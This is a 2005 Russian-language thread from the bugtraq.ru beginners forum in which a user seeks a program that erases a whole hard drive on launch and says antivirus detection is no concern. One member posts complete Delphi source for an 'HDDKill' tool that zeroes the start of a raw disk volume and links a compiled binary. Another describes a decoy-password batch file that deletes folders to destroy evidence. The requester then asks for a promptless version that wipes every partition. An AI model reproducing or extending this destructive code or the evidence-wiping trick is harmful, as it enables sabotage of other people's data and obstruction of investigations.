информационная безопасность
без паники и всерьез
 подробно о проектеRambler's Top100
Страшный баг в WindowsГде водятся OGRы
BugTraq.Ru
Русский BugTraq
 Анализ криптографических сетевых... 
 Модель надежности двухузлового... 
 Специальные марковские модели надежности... 
 Блокировка российских аккаунтов... 
 Отзыв сертификатов ЦБ РФ, ПСБ,... 
 Памятка мирным людям во время информационной... 
главная обзор RSN блог библиотека закон бред форум dnet о проекте
bugtraq.ru / форум / beginners
Имя Пароль
ФОРУМ
если вы видите этот текст, отключите в настройках форума использование JavaScript
регистрация





Легенда:
  новое сообщение
  закрытая нитка
  новое сообщение
  в закрытой нитке
  старое сообщение
  • Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
  • Новичкам также крайне полезно ознакомиться с данным документом.
Господа, будьте снисходительны, не бросайтесь сразу штрафовать за, как вам кажется, глупые вопросы - beginners на то и beginners.
Там нужно вводить то, на что програмка среагирует. Если... 23.05.05 14:32  Число просмотров: 2073
Автор: DPP <Dmitry P. Pimenov> Статус: The Elderman
<"чистая" ссылка>
> Скачал, запустил в винде- ничего. Запустил в виндовским
> DOS-е, там выписывает что надо писат так: hddkill.exe c: -
> пример если хотим стереть c:\. Написал так- появился вопрос
> "я уверен" "да" или "нет" я нажал "да" и ничего опять не
> произошло........

Там нужно вводить то, на что програмка среагирует. Если автор задумал "Y" причем прописную, то надо прописную и вводить. Если он перед тем, как склепать екзешку ничего не подправил.
Попробуйте такие варианты, как большие и маленькие буквы "y", "Y", "Д", "д", "да", "ДА", "Да"...
<beginners>
Стереть все с запуска одного файла! 22.05.05 22:17  
Автор: mf_3_hd Статус: Незарегистрированный пользователь
<"чистая" ссылка>
Уже много времени я ищу прогу которая стирала бы всю инфу на винчестере запустив ее на компютер. Единственый результат моего поиска вот ета прога: Hard Drive Killer Pro (HDKP) http://www.hackology.com/programs/hdkp/ginfo.shtml

Ета прога меня 100% устраивает, но проблема в том что она очень стара и под Windows XP SP1 и SP2 не пашет. Наверна она только для 98. Моя просбя к вам - кто нибудь знает такой софт как выше указаный мною, но только чтобы работал под WIN XP???

Если прогу ловят антивирусы ето не проблема, важно чтобы она работала.....

Забыл уточнить: должна работать на FAT32, но если в добавок может и на NTFS ето еще лутчше
я видел другую тему - при вводе определённого пароля при... 23.05.05 11:08  
Автор: Ryan Статус: Незарегистрированный пользователь
<"чистая" ссылка>
я видел другую тему - при вводе определённого пароля при запуске компа выбранные папки грохаются. то есть подсказав пароль можно избавится от улик )
Эта проблема одним батником решается. Предположим... 23.05.05 11:31  
Автор: DPP <Dmitry P. Pimenov> Статус: The Elderman
<"чистая" ссылка>
> я видел другую тему - при вводе определённого пароля при
> запуске компа выбранные папки грохаются. то есть подсказав
> пароль можно избавится от улик )

Эта проблема одним батником решается. Предположим пользователя "Адмиристратор" переименуем в "Админ", заведем нового "Администратора", наделив его нужными правами, поставим ему в автозапуск (можно в запуск по расписанию при логине) этот батник, в котором будет прописываться "гроханье всего того, что нужно грохнуть". Вот, когда плохой дядька придет и начнет пальцы ломать, сказать пароль этого "Администратора". Самому, чтоб случайно все нужное не грохнуть, входить под "Админом". Слишком опытные, но неторопливые на такие уловки не пойдут, они винт вторым подцепят. А чтоб самому быстро грохнуть все, нужно просто перелогиниться.
Походу тема актуальна... Закодил на Delphi утилиту ;-) 23.05.05 08:34  
Автор: HandleX <Александр М.> Статус: The Elderman
Отредактировано 23.05.05 08:41  Количество правок: 2
<"чистая" ссылка>
Потренировался на кошках... Дискеты стирает на-ура.
Если кто хочет поиздеваться над загрузочным разделом, расскажите об успехах ;-)

program HDDKill;

{$APPTYPE CONSOLE}

uses Windows, SysUtils;

Const
  BuffSize = 512 * 1024; //Интересно, хватит ли полметра для убийства диска? ;-)
Var
  hVol: THandle;
  pMemBuff: Pointer;
  Writed: DWORD;
  anAnswer: String;
begin
  Try
    WriteLn;
    WriteLn('       -= Fast HDD killer by HandleX... Use it free at your own risk! =-');
    If (ParamCount <> 1) Or (Length(ParamStr(1)) <> 2) Or (ParamStr(1)[2] <> ':') Then
    Begin
      WriteLn('Error: invalid input parameter. Sample using: "HDDKill C:"');
      Halt;
    End;

    Write('Are you shure you want to kill drive ', ParamStr(1), ' ??? Enter "Y" to continue... ');
    ReadLn(anAnswer);
    If anAnswer <> 'Y' Then Halt;

    hVol := CreateFile(PChar('\\.\' + ParamStr(1)), GENERIC_WRITE, FILE_SHARE_READ Or FILE_SHARE_WRITE, Nil, OPEN_EXISTING, 0, 0);
    If hVol = INVALID_HANDLE_VALUE Then RaiseLastWin32Error;
    GetMem(pMemBuff, BuffSize);
    Writed := 0;
    WriteLn('Writing...');
    If Not WriteFile(hVol, pMemBuff^, BuffSize, Writed, Nil) Then RaiseLastWin32Error;

    WriteLn;
    WriteLn(Writed, ' bytes of zeros was written at beginning of drive ', ParamStr(1));
  Except
    On E: Exception Do
    Begin
      WriteLn('Exception class "' + E.ClassName + '" occured with message "' + E.Message + '".');
      WriteLn('Program terminated');
    End;
  End;
end.

---
Эх 23.05.05 11:58  
Автор: amirul <Serge> Статус: The Elderman
<"чистая" ссылка>
> Потренировался на кошках... Дискеты стирает на-ура.
> Если кто хочет поиздеваться над загрузочным разделом,
> расскажите об успехах ;-)
Написал бы ты на нормальном языке :-Р, я бы попробовал (VMware как бумага - стерпит все)
Ну тогда линк ловите (внутри)... Походу, там некоторые символы скрипт на сайте как тэги воспринял... 23.05.05 12:32  
Автор: HandleX <Александр М.> Статус: The Elderman
Отредактировано 23.05.05 13:54  Количество правок: 3
<"чистая" ссылка>


Прога
Не запускается (вернее вылетает по exception-у) 23.05.05 13:30  
Автор: amirul <Serge> Статус: The Elderman
<"чистая" ссылка>
Я записал в .txt поменял extension на .exe запустил и ничего... 23.05.05 13:51  
Автор: mf_3_hd Статус: Незарегистрированный пользователь
<"чистая" ссылка>
Я записал в .txt поменял extension на .exe запустил и ничего не произошло. Я все правильно сделал?
Ничего, бывает. 23.05.05 13:57  
Автор: DPP <Dmitry P. Pimenov> Статус: The Elderman
Отредактировано 23.05.05 14:27  Количество правок: 2
<"чистая" ссылка>
Программа была закодирована, чтоб ее можно было "вывесить" на форуме. Надо было разкодировать, а не прость тело письма сохранить как текст и переименовать его в екзешник.
Я уж залил на FTP... Проблема техническая и человеческая смешались... Судьба противится, когда непосвященные дотрагиваются таких утилит :) 23.05.05 14:00  
Автор: HandleX <Александр М.> Статус: The Elderman
<"чистая" ссылка>
Господа, будьте снисходительны, не бросайтесь сразу... 23.05.05 14:06  
Автор: mf_3_hd Статус: Незарегистрированный пользователь
<"чистая" ссылка>
Господа, будьте снисходительны, не бросайтесь сразу штрафовать за, как вам кажется, глупые вопросы - beginners на то и beginners

Господа прошу вас обясните как надо сделать ..... все таки ета не моя сильная область, я в енергетике разбираюсь, а ето хоби :)))
Забери отсюда: ftp://nikol.biz/Prog/hddkill.exe 23.05.05 14:13  
Автор: HandleX <Александр М.> Статус: The Elderman
<"чистая" ссылка>
Скачал, запустил в винде- ничего. Запустил в виндовским... 23.05.05 14:24  
Автор: mf_3_hd Статус: Незарегистрированный пользователь
<"чистая" ссылка>
Скачал, запустил в винде- ничего. Запустил в виндовским DOS-е, там выписывает что надо писат так: hddkill.exe c: - пример если хотим стереть c:\. Написал так- появился вопрос "я уверен" "да" или "нет" я нажал "да" и ничего опять не произошло........
Там нужно вводить то, на что програмка среагирует. Если... 23.05.05 14:32  
Автор: DPP <Dmitry P. Pimenov> Статус: The Elderman
<"чистая" ссылка>
> Скачал, запустил в винде- ничего. Запустил в виндовским
> DOS-е, там выписывает что надо писат так: hddkill.exe c: -
> пример если хотим стереть c:\. Написал так- появился вопрос
> "я уверен" "да" или "нет" я нажал "да" и ничего опять не
> произошло........

Там нужно вводить то, на что програмка среагирует. Если автор задумал "Y" причем прописную, то надо прописную и вводить. Если он перед тем, как склепать екзешку ничего не подправил.
Попробуйте такие варианты, как большие и маленькие буквы "y", "Y", "Д", "д", "да", "ДА", "Да"...
Так :) кажется все работает, надо было писать как показано... 23.05.05 14:50  
Автор: mf_3_hd Статус: Незарегистрированный пользователь
Отредактировано 23.05.05 15:02  Количество правок: 2
<"чистая" ссылка>
> Попробуйте такие варианты, как большие и маленькие буквы
> "y", "Y", "Д", "д", "да", "ДА", "Да"...

Так :) кажется все работает, надо было писать как показано большое "Y", а я писал маленкое "y".
У меня последняя просьба, не мог ли автор етой проги сделат така чтобы не надо было заходить в DOS и писать команды. А просто запустить прогу и она обноружив все разделы - стереть их???

Как тот пример который я дал в первом посте.

EDIT

и еще хотел спросить. После такого "убийства", можно информацию с винчестера спасти или невозможно?
Не, это сильно злобный вариант... Там даже от Echo защита стоит, дабы скриптами не исполняли ;) Кому надо, тот перекомпилит. 23.05.05 15:03  
Автор: HandleX <Александр М.> Статус: The Elderman
Отредактировано 23.05.05 15:10  Количество правок: 1
<"чистая" ссылка>
Кстати, ты не на своей рабочей машине испытывал эту программу?

А то это... Прощай винда...
На своей, только жосткий диск меняю. 23.05.05 15:43  
Автор: mf_3_hd Статус: Незарегистрированный пользователь
<"чистая" ссылка>
> Кстати, ты не на своей рабочей машине испытывал эту
> программу?
>
> А то это... Прощай винда...

На своей, только жосткий диск меняю.
А ты можеш перекомпилить?
Я готов попробовать. 23.05.05 11:10  
Автор: mf_3_hd Статус: Незарегистрированный пользователь
<"чистая" ссылка>
> Потренировался на кошках... Дискеты стирает на-ура.
> Если кто хочет поиздеваться над загрузочным разделом,
> расскажите об успехах ;-)
>
Я готов попробовать.
А ета програма только один раздел стерает или все? Мне нужно все со всеми файлами и т.д.
И на последнем месте- скажи как надо скомпилировать, чтобы получилась прога?
нечто подобное уже спаршивалось не так давно: 23.05.05 00:57  
Автор: fly4life <Александр Кузнецов> Статус: Elderman
<"чистая" ссылка>
http://bugtraq.ru/cgi-bin/forum.mcgi?type=sb&b=6&m=120233
format c: 23.05.05 00:46  
Автор: Heller <Heller> Статус: Elderman
<"чистая" ссылка>
1  |  2 >>  »  




Rambler's Top100
Рейтинг@Mail.ru


  Copyright © 2001-2022 Dmitry Leonov   Page build time: 0 s   Design: Vadim Derkach